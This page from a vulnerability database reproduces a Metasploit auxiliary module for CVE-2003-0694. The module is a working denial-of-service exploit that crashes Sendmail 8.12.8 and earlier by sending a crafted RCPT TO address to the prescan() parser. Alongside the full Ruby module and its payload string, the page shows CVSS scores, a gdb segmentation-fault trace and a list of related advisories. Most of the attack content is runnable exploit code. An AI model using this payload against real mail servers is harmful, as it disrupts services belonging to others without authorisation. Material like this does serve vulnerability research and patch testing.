Lucene search
HistorySep 12, 2009 - 10:56 a.m.
Sendmail SMTP Address prescan Memory Corruption
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
This is a proof of concept denial of service module for Sendmail versions 8.12.8 and earlier. The vulnerability is within the prescan() method when parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00 bytes can be used, limiting the likelihood for arbitrary code execution.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Smtp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Sendmail SMTP Address prescan Memory Corruption',
'Description' => %q{
This is a proof of concept denial of service module for Sendmail versions
8.12.8 and earlier. The vulnerability is within the prescan() method when
parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00
bytes can be used, limiting the likelihood for arbitrary code execution.
},
'Author' => [ 'aushack' ],
'References' =>
[
[ 'OSVDB', '2577' ],
[ 'CVE', '2003-0694' ],
[ 'BID', '8641' ],
[ 'EDB', '24' ]
],
'DisclosureDate' => '2003-09-17'))
end
def run
begin
connect
# we use connect instead of connect_login,
# because we send our own malicious RCPT.
# however we want to make use of MAILFROM
# and raw_send_recv()
#select(nil,nil,nil,23) # so we can attach gdb to the child PID
sploit = ("A" * 255 + ";") * 4 + "A" * 217 + ";" + "\x5c\xff" * 28
raw_send_recv("EHLO X\r\n")
raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
print_status("Sending DoS packet.")
raw_send_recv("RCPT TO: #{sploit}\r\n")
disconnect
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport}")
rescue ::EOFError
print_status("Sendmail stopped responding after sending trigger - target vulnerable.")
end
end
end
=begin
Program received signal SIGSEGV, Segmentation fault.
0x8073499 in ?? ()
(gdb) bt
#0 0x807e499 in ?? ()
#1 0x087e125 in ?? ()
#2 0x5c5c5c5c in ?? ()
Error accessing memory address 0x5c5c5c5c: Bad address.
=end
Related
cvelist
cvelist
CVE-2003-0694
2003-09-18 04:00:00
redhat
redhat
(RHSA-2003:284) sendmail security update
2003-09-17 00:00:00
nessus
nessus
SUSE-SA:2003:040: sendmail, sendmail-tls
2004-07-25 00:00:00
AIX 5.2 : IY48657
2004-09-01 00:00:00
AIX 5.1 : IY48658
2004-09-01 00:00:00
nvd
nvd
CVE-2003-0694
2003-10-06 04:00:00
ubuntucve
ubuntucve
CVE-2003-0694
2003-10-06 00:00:00
packetstorm
packetstorm
Sendmail SMTP Address prescan Memory Corruption
2024-08-31 00:00:00
suse
suse
local/remote privilege escalation in sendmail, sendmail-tls
2003-09-20 16:11:37
cve
cve
CVE-2003-0694
2003-10-06 04:00:00
debiancve
debiancve
CVE-2003-0694
2003-10-06 04:00:00
openvas
openvas
Debian: Security Advisory (DSA-384)
2008-01-17 00:00:00
Debian Security Advisory DSA 384-1 (sendmail)
2008-01-17 00:00:00
osv
osv
sendmail - buffer overflows
2003-09-17 00:00:00
cert
cert
Sendmail prescan() buffer overflow vulnerability
2003-09-17 00:00:00
debian
debian
[SECURITY] [DSA-384-1] New sendmail packages fix buffer overflows
2003-09-18 02:19:55
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
Related for MSF:AUXILIARY-DOS-SMTP-SENDMAIL_PRESCAN-